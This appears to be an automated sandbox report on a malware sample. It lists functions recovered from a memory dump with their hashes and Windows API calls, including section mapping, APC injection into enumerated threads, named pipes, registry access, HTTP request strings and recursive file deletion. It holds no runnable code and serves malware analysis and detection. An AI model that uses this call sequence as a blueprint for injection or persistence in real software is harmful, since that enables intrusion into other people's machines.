  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
